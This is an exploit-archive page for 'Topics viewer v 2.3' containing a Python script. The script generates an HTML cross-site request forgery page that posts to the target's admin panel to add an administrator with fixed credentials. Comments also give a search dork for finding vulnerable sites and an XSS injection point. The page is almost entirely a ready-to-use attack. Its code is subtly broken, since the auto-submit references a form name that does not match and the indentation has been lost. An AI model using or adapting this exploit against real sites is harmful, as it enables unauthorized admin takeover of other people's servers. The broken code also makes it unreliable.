Topics viewer v 2.3 csrf (Add Admin) / XSS Vulnerabilites



EKU-ID: 2121 CVE: OSVDB-ID:
Author: Cyber-Crystal Published: 2012-05-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python
########################################################################
# Title    : Topics viewer v 2.3 csrf Add Admin and XSS
# Author   : Cyber-Crystal
# Version  : 2.3
# Homepage : http://nilehoster.com/default/topicsviewer
# Dork     : "Programmed by : Nilehoster.com"
# Tested on: Win/7
# Based on POC : http://vb.ehcommunity.com/showthread.php?t=70682
# CVE : 14 May 2012
#---------------------------------------------------------------------
# ^_^ > snc0pe | secure-x41 | Dmar al3noOoz | al-swisre || All
#
#
# Xss Exploit is Here :
# http://localhost//admincp/edit_block.php?id=XSS

import sys
import string
import os


def banner():
print '''
----------------------------------
Topics viewer v 2.3 csrf Add Admin
----------------------------------

[+] python Exploit.py http://www.exp.com 
'''
if os.name == "nt":
os.system("cls")
os.system("color e")
else :
os.system('clear')

if len(sys.argv) < 2:
banner()
sys.exit()

vic = sys.argv[1].replace("http://","").replace("/","")
file = open("Exploit.html", "w")


db = ("<html>\n"
"<body>\n"
"<form action='http://"+vic+"/admincp/main.php?op=add-admin' method='post' name='sdf'>\n"
"<input type='text' name='u_name' value='p0c' />\n"
"<input type='text' name='u_m_pass' value='1212' />\n"
"<input type='text' name='u_email' value='p0c@p0c.com' />\n"
"<input type='text' name='verification' value='101010'/> <!-- Any number-->\n"
"<script>document.xss.submit();</script><br />\n"
"<input type='submit' value='Exploit'/>\n"
"</form>\n"
"</body>\n"
"</html>\n")

file.write(db)
print "Createing ...\n"
print "user Name And Password ...\n"
print "User : p0c \t Pass : 1212"

# The End